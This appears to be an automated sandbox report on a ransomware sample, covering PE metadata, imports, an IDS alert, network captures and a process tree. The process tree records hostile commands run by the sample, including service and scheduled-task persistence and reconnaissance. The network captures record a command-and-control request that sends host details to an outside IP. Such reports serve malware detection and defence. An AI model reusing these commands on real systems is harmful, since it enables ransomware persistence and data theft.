                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x490f31
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows cui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x65D53BC5 [Tue Feb 20 23:54:45 2024 UTC]
                                                                                                      TLS Callbacks:0x490570
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:f527e8080fac9432953c548a4f7317af
                                                                                                      Instruction
                                                                                                      call 00007F922538E207h
                                                                                                      jmp 00007F922538D389h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      cmp cl, 00000040h
                                                                                                      jnc 00007F922538D527h
                                                                                                      cmp cl, 00000020h
                                                                                                      jnc 00007F922538D518h
                                                                                                      shrd eax, edx, cl
                                                                                                      shr edx, cl
                                                                                                      ret
                                                                                                      mov eax, edx
                                                                                                      xor edx, edx
                                                                                                      and cl, 0000001Fh
                                                                                                      shr eax, cl
                                                                                                      ret
                                                                                                      xor eax, eax
                                                                                                      xor edx, edx
                                                                                                      ret
                                                                                                      int3
                                                                                                      push esi
                                                                                                      mov eax, dword ptr [esp+14h]
                                                                                                      or eax, eax
                                                                                                      jne 00007F922538D53Ah
                                                                                                      mov ecx, dword ptr [esp+10h]
                                                                                                      mov eax, dword ptr [esp+0Ch]
                                                                                                      xor edx, edx
                                                                                                      div ecx
                                                                                                      mov ebx, eax
                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                      div ecx
                                                                                                      mov esi, eax
                                                                                                      mov eax, ebx
                                                                                                      mul dword ptr [esp+10h]
                                                                                                      mov ecx, eax
                                                                                                      mov eax, esi
                                                                                                      mul dword ptr [esp+10h]
                                                                                                      add edx, ecx
                                                                                                      jmp 00007F922538D559h
                                                                                                      mov ecx, eax
                                                                                                      mov ebx, dword ptr [esp+10h]
                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                      shr ecx, 1
                                                                                                      rcr ebx, 1
                                                                                                      shr edx, 1
                                                                                                      rcr eax, 1
                                                                                                      or ecx, ecx
                                                                                                      jne 00007F922538D506h
                                                                                                      div ebx
                                                                                                      mov esi, eax
                                                                                                      mul dword ptr [esp+14h]
                                                                                                      mov ecx, eax
                                                                                                      mov eax, dword ptr [esp+10h]
                                                                                                      mul esi
                                                                                                      add edx, ecx
                                                                                                      jc 00007F922538D520h
                                                                                                      cmp edx, dword ptr [esp+0Ch]
                                                                                                      jnbe 00007F922538D51Ah
                                                                                                      jc 00007F922538D521h
                                                                                                      cmp eax, dword ptr [esp+08h]
                                                                                                      jbe 00007F922538D51Bh
                                                                                                      dec esi
                                                                                                      sub eax, dword ptr [esp+10h]
                                                                                                      sbb edx, dword ptr [esp+14h]
                                                                                                      xor ebx, ebx
                                                                                                      sub eax, dword ptr [esp+08h]
                                                                                                      sbb edx, dword ptr [esp+0Ch]
                                                                                                      neg edx
                                                                                                      neg eax
                                                                                                      sbb edx, 00000000h
                                                                                                      mov ecx, edx
                                                                                                      mov edx, ebx
                                                                                                      mov ebx, ecx
                                                                                                      mov ecx, eax
                                                                                                      mov eax, esi
                                                                                                      pop esi
                                                                                                      retn 0010h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      Programming Language:
                                                                                                      • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x11d9cc         0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x130000         0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x131000         0xd728        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x105670         0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x10574c         0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x1056a8         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xe3000          0x328         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy            Characteristics
.text   0x1000           0xe12e6       0xe1400   e0d74f80a28bb2849cb3625249eaaadd  False     0.459934924736404    zlib compressed data  6.644805642900756  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0xe3000          0x3bc10       0x3be00   963bb6f93dc59e32ea462a0ad9c4cbb6  False     0.39376467901878914  data                  5.005363006540915  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x11f000         0x10778       0x8200    f70591f8b968a1166c678e28b557c9da  False     0.15655048076923078  data                  4.832432461427509  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x130000         0x1e0         0x200     319e7ac1640c4d053129c81ac0038351  False     0.52734375           data                  4.701503258251789  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x131000         0xd728        0xd800    3849f621e39858240cd95052fca19b06  False     0.5704571759259259   data                  6.576011148892834  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                      Language  Country        ZLIB Complexity
RT_MANIFEST  0x130060  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727
DLL  Imports
KERNEL32.dll: Sleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
USER32.dll: EnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
ADVAPI32.dll: CryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
SHELL32.dll: ShellExecuteW
WS2_32.dll: htons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
SHLWAPI.dll: PathIsNetworkPathA
NETAPI32.dll: NetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
WININET.dll: HttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                         SID      Signature                                                     Severity  Source IP     Source Port  Dest IP        Dest Port  Protocol
2024-12-06T13:42:11.708896+0100  2045821  ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity  1         192.168.2.10  49715        185.147.34.53  3586       TCP
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 6, 2024 13:42:23.033804893 CET  49709        80         192.168.2.10   104.26.13.205
Dec 6, 2024 13:42:23.153645039 CET  80           49709      104.26.13.205  192.168.2.10
Dec 6, 2024 13:42:23.153726101 CET  49709        80         192.168.2.10   104.26.13.205
Dec 6, 2024 13:42:23.153920889 CET  49709        80         192.168.2.10   104.26.13.205
Dec 6, 2024 13:42:23.273821115 CET  80           49709      104.26.13.205  192.168.2.10
Dec 6, 2024 13:42:24.255562067 CET  80           49709      104.26.13.205  192.168.2.10
Dec 6, 2024 13:42:24.255754948 CET  49709        80         192.168.2.10   104.26.13.205
Dec 6, 2024 13:42:24.265717983 CET  49715        3586       192.168.2.10   185.147.34.53
Dec 6, 2024 13:42:24.386933088 CET  3586         49715      185.147.34.53  192.168.2.10
Dec 6, 2024 13:42:24.387010098 CET  49715        3586       192.168.2.10   185.147.34.53
Dec 6, 2024 13:42:24.387089014 CET  49715        3586       192.168.2.10   185.147.34.53
Dec 6, 2024 13:42:24.507087946 CET  3586         49715      185.147.34.53  192.168.2.10
Dec 6, 2024 13:42:24.507106066 CET  3586         49715      185.147.34.53  192.168.2.10
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Dec 6, 2024 13:42:22.887763023 CET  60944        53         192.168.2.10  1.1.1.1
Dec 6, 2024 13:42:23.025604963 CET  53           60944      1.1.1.1       192.168.2.10
Timestamp                           Source IP     Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Dec 6, 2024 13:42:22.887763023 CET  192.168.2.10  1.1.1.1  0x8b00    Standard query (0)  api.ipify.org  A (IP address)  IN (0x0001)  false

Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
Dec 6, 2024 13:42:23.025604963 CET  1.1.1.1    192.168.2.10  0x8b00    No error (0)  api.ipify.org         104.26.13.205  A (IP address)  IN (0x0001)  false
Dec 6, 2024 13:42:23.025604963 CET  1.1.1.1    192.168.2.10  0x8b00    No error (0)  api.ipify.org         172.67.74.152  A (IP address)  IN (0x0001)  false
Dec 6, 2024 13:42:23.025604963 CET  1.1.1.1    192.168.2.10  0x8b00    No error (0)  api.ipify.org         104.26.12.205  A (IP address)  IN (0x0001)  false
• api.ipify.org
• 185.147.34.53
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49709        104.26.13.205   80                7364  C:\Users\user\Desktop\BiXS3FRoLe.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 6, 2024 13:42:23.153920889 CET  82                 OUT
GET / HTTP/1.1
Accept: text/*
User-Agent: YourUserAgent
Host: api.ipify.org

Dec 6, 2024 13:42:24.255562067 CET  429                IN
HTTP/1.1 200 OK
Date: Fri, 06 Dec 2024 12:42:24 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8edc5b0c8a4b4244-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
Data Ascii: 8.46.123.228


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49715        185.147.34.53   3586              7364  C:\Users\user\Desktop\BiXS3FRoLe.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 6, 2024 13:42:24.387089014 CET  2116               OUT
GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~ [TRUNCATED]
Host: 185.147.34.53
Connection: close



Target ID: 0
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Users\user\Desktop\BiXS3FRoLe.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\BiXS3FRoLe.exe"
Imagebase: 0xa70000
File size: 1'257'984 bytes
MD5 hash: 8F807535948B5E93317BAF48A4D0E69D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
Imagebase: 0xd70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist /v /fo csv
Imagebase: 0x460000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /i "dcdcf"
Imagebase: 0x990000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 07:42:14
Start date: 06/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 07:42:15
Start date: 06/12/2024
Path: C:\Windows\System32\Sgrmuserer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\Sgrmuserer.exe
Imagebase: 0x7ff749ad0000
File size: 329'504 bytes
MD5 hash: 3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 07:42:15
Start date: 06/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                      Target ID:9
                                                                                                      Start time:07:42:15
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:11
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:14
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:16
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:17
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:18
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:19
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                                                                                      Imagebase:0xf70000
                                                                                                      File size:147'456 bytes
                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:20
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:21
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                                                                                      Imagebase:0x2d0000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:22
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:23
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:24
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x2c0000
                                                                                                      File size:76'800 bytes
                                                                                                      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:25
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:26
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /i "os name"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:27
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:29
